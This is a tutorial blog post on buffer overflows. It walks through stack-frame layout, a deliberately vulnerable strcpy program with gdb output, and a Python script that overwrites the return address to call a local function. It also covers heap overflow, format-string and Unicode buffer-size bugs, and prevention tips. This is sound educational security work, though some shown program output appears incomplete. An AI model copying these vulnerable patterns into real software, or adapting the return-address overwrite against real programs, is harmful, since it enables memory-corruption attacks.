Buffer overflow attack

In the previous post, I introduced the concept of buffer overflow. In this post, I will show you how to find and exploit a buffer overflow vulnerability.

Of all buffer overflows, stack overflows are usually the easiest to exploit. Before looking at stack overflows, make sure you understand the following concepts:

  1. Buffers
    In short, a buffer is a contiguous area of computer memory that holds multiple instances of the same data type.
  2. Stack
    A stack is an abstract data type that is often used in computer science. Its defining property is that the last object placed on the stack is always the first one removed, which is why it is called a last-in, first-out (LIFO) structure. The stack defines several operations, and the two most important are PUSH and POP. PUSH adds an element to the top of the stack. POP, in contrast, removes the element at the top of the stack and reduces the stack size by one.
  3. Registers ESP, EBP, and EIP
    1. The ESP register holds the address of the top of the current thread's stack.
    2. The EBP register holds the base address of the current stack frame.
    3. The EIP register holds the memory address of the next instruction. When the CPU finishes the current instruction, it reads the address of the next instruction from EIP and continues execution there.

Modern computers are designed with high-level languages in mind. The most important technique for structuring programs in a high-level language is the procedure, or function. From one point of view, a procedure call changes the control flow of a program just as a jump does, but unlike a jump, a function returns control to the statement or instruction following the call when it finishes. This high-level abstraction is implemented with the help of the stack. The stack is also used to dynamically allocate space for the local variables of a function, to pass parameters to it, and to return values from it.

The stack consists of logical stack frames. A stack frame is pushed onto the stack when a function is called and popped off the stack when the function returns. The stack frame contains the parameters of the function, its local variables, and the data required to restore the previous stack frame, including the value of the instruction pointer (IP) at the time of the function call.

The first thing a routine must do when it is called is save the previous frame pointer (FP) so that it can be restored when the routine exits. It then copies the stack pointer (SP) into FP to create the new FP, and advances SP to reserve space for the local variables. This is called the prolog of the routine. When the routine exits, the stack must be cleaned up again, which is called the epilog of the routine. Intel's ENTER and LEAVE instructions and Motorola's LINK and UNLINK instructions are provided to do most of the prolog and epilog work efficiently.

Below we use a simple example to show what the stack looks like. example1.c:

void function(int a, int b, int c) {
    char buffer1[5];
    char buffer2[10];
}

int main(void) {
    function(1, 2, 3);
    return 0;
}

To understand what the program does when it calls function(), we compile with gcc's -S option to produce assembly code output:

$ gcc -S -o example.s example1.c


Looking at the assembly language output, we see that the call to function() is translated to:

pushl $3
pushl $2
pushl $1
call function


This pushes the three arguments of the function onto the stack in reverse order and then calls function(). The call instruction also pushes the instruction pointer (IP) onto the stack. We call this saved IP the return address (RET). The first thing done inside the function is the prolog of the routine:

pushl %ebp
movl %esp,%ebp
subl $20,%esp


The frame pointer EBP is pushed onto the stack, and the current SP is copied into EBP, making it the new frame pointer. We call this saved FP the SFP. Next, SP is decreased to reserve space for the local variables. Remember that in this example stack space is allocated in multiples of the word size, where a word is 4 bytes (32 bits). A 5-byte buffer therefore takes up 8 bytes (2 words) of memory, and a 10-byte buffer takes up 12 bytes (3 words). That is why 20 is subtracted from SP. With that in mind, the stack looks like this when function() is called:

low addresses (top of stack)                     high addresses (bottom of stack)
  buffer2       buffer1      sfp    ret    a      b      c
[ 12 bytes ][  8 bytes  ][  4  ][  4  ][  4  ][  4  ][  4  ]

From this layout, if we write more data into buffer1 than it can hold, the excess overwrites the SFP and RET that follow it, so we can change the return address of the function. Let's look at an example.


Writing shellcode, placing the dangerous code in memory ahead of time, and calculating the overflow precisely enough to run that code and then return to the original return address all require a lot of low-level assembly knowledge. I am only a beginner here myself and no master hacker. Still, understanding how attackers work is very useful for improving the security of our own code.

So, in this example, we assume that the so-called dangerous code is already in the source code, as the function bar. The function foo is a normal function that is called from main and performs a very unsafe strcpy. Because strcpy does no bounds checking, we can pass a string longer than buf. The copy then overflows the buffer and overwrites the return address (RET) with the address of bar, so bar gets called.

#include <stdio.h>
#include <string.h>
void foo(const char* input)
{
    char buf[10];
    printf("My stack looks like:\n%p\n%p\n%p\n%p\n%p\n%p\n%p\n\n"); /* no arguments on purpose: dumps raw stack words */
    strcpy(buf, input); /* unsafe: no bounds check on input */
    printf("buf = %s\n", buf);
    printf("Now the stack looks like:\n%p\n%p\n%p\n%p\n%p\n%p\n%p\n\n");
}
void bar(void)
{
    printf("Augh! I've been hacked!\n");
}
int main(int argc, char* argv[])
{
    printf("Address of foo = %p\n", foo);
    printf("Address of bar = %p\n", bar);
    if (argc != 2)
    {
        printf("Please supply a string as an argument!\n");
        return -1;
    }
    foo(argv[1]);
    return 0;
}


Compile the program with GCC, turning off the stack protector (GCC's built-in buffer overflow protection):

gcc -g -fno-stack-protector test.c -o test


To find the return address, I debug the compiled program with gdb.

(gdb) r

Starting program: /media/Personal/MyProject/C/StackOver/test abc
Address of foo = 0x80483d4
Address of bar = 0x8048419

Breakpoint 1, main (argc=2, argv=0xbfe5ab24) at test.c:24
24 foo(argv[1]);

(gdb) info registers ebp
ebp 0xbfe5aa88 0xbfe5aa88
(gdb) n

Breakpoint 2, foo (input=0xbfe5c652 "abc") at test.c:4
4 {
(gdb) n
6 printf("My stack looks like:\n%p\n%p\n%p\n%p\n%p\n%p\n%p\n\n");

(gdb) info registers ebp
ebp 0xbfe5aa68 0xbfe5aa68

(gdb) x/ 0xbfe5aa68
0xbfe5aa68: 0xbfe5aa88
(gdb) n
My stack looks like:
7 strcpy(buf, input);

(gdb) x/i 0x8048499
0x8048499 <main+108>: movl $0x8048653,(%esp)
(gdb) disassemble main
Dump of assembler code for function main:
0x0804842d <main+0>: lea 0x4(%esp),%ecx
0x08048431 <main+4>: and $0xfffffff0,%esp
0x08048434 <main+7>: pushl -0x4(%ecx)
0x08048437 <main+10>: push %ebp

0x08048494 <main+103>: call 0x80483d4 <foo>
0x08048499 <main+108>: movl $0x8048653,(%esp)
0x080484a0 <main+115>: call 0x8048340 <puts@plt>


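The return address saved in foo's stack frame is 0x08048499, the instruction in main right after the call to foo. Therefore, all we need to do is pass a string long enough to overwrite 0x08048499 with the address of bar, 0x8048419, so that foo returns into bar instead of main. Since the bytes of an address such as 0x8048419 are not characters we can simply type on the command line, we build the argument with a Perl or Python script, such as the following Python script: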

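import subprocess
# 14 filler bytes, then the address of bar (0x08048419) in little-endian byte order.
# Bytes are passed as-is so the script behaves the same under Python 2 and 3.
arg = b'ABCDEFGHIJKLMN' + b'\x19\x84\x04\x08'
subprocess.call([b'./test', arg])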

Note that the four bytes of the address 08 04 84 19 are written in reverse order, because x86 is little-endian. Run the script:

$ python hack.py
Address of foo = 0x80483d4
Address of bar = 0x8048419
My stack looks like:

Now the stack looks like:

Heap Overflows

A heap is an area of memory that the application allocates dynamically at run time. Heap memory differs from stack memory in that it persists across function calls: memory allocated inside a function stays allocated until it is explicitly freed. As a result, a heap overflow may go unnoticed until the corrupted memory is used later. Here is one of the simplest possible examples of a heap overflow:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[])
{
    char *input = malloc(20);
    char *output = malloc(20);

    strcpy(output, "normal output");
    strcpy(input, argv[1]);  /* unsafe: argv[1] may be longer than 20 bytes */

    printf("input at %p: %s\n", input, input);
    printf("output at %p: %s\n", output, output);

    printf("\n\n%s\n", output);
    return 0;
}

Here is what happens when we run it:

[root@localhost]# ./heap1 hackshacksuselessdata
input at 0x8049728: hackshacksuselessdata
output at 0x8049740: normal output

normal output
[root@localhost]# ./heap1 hacks1hacks2hacks3hacks4hacks5hacks6hacks7hackshackshackshackshackshackshacks
input at 0x8049728: hacks1hacks2hacks3hacks4hacks5hacks6hacks7hackshackshackshackshackshackshacks
output at 0x8049740: hackshackshackshacks5hacks6hacks7

[root@localhost]# ./heap1 "hackshacks1hackshacks2hackshacks3hackshacks4what have I done?"
input at 0x8049728: hackshacks1hackshacks2hackshacks3hackshacks4what have I done?
output at 0x8049740: what have I done?

Format string errors

This error occurs when functions such as printf, sprintf, and fprintf are called with user input in place of a format string. For example, the correct usage is:

printf("%s", input);

If it is instead written directly as:

printf(input);

then there is a vulnerability: when the input contains maliciously crafted format specifiers, memory can be read or overwritten and attacker-chosen instructions can be executed.

Unicode and ANSI buffer sizes do not match

We often need to convert between Unicode and ANSI strings. The vast majority of Unicode functions measure buffer sizes in wide characters (two bytes each) rather than in bytes, so a careless conversion can cause an overflow. The most commonly attacked function is MultiByteToWideChar. Consider the following code:

BOOL GetName(char *szName)
{
    WCHAR wszUserName[256];

    // Convert ANSI name to Unicode.
    MultiByteToWideChar(CP_ACP, 0,
                        szName,
                        -1,
                        wszUserName,
                        sizeof(wszUserName));  // BUG: size in bytes, not in characters
    // ...
}

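wszUserName is a wide-character array, so sizeof(wszUserName) is 256 * 2 = 512 bytes, while the last parameter of MultiByteToWideChar expects the buffer size in wide characters. The function is therefore told that the buffer is twice as large as it really is, which creates a potential buffer overflow. The correct code is: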

MultiByteToWideChar(CP_ACP, 0,
                    szName,
                    -1,
                    wszUserName,
                    sizeof(wszUserName) / sizeof(wszUserName[0]));

The Internet Printing Protocol (IPP) buffer overflow was a real-world vulnerability caused by exactly this kind of mistake.

Prevention and detection

  • Unsafe functions
    Avoid unsafe string-handling functions and use their safer counterparts instead:

    Unsafe function    Safer function
    strcpy             strncpy
    strcat             strncat
    sprintf            _snprintf
    gets               fgets
  • Visual C++ .NET /GS option
    The /GS option helps protect the integrity of the stack by detecting stack corruption, but it cannot completely prevent buffer overflows. For example, /GS does nothing against heap overflows.
  • Source code scanning
    The simplest source code scan:

    grep strcpy *.c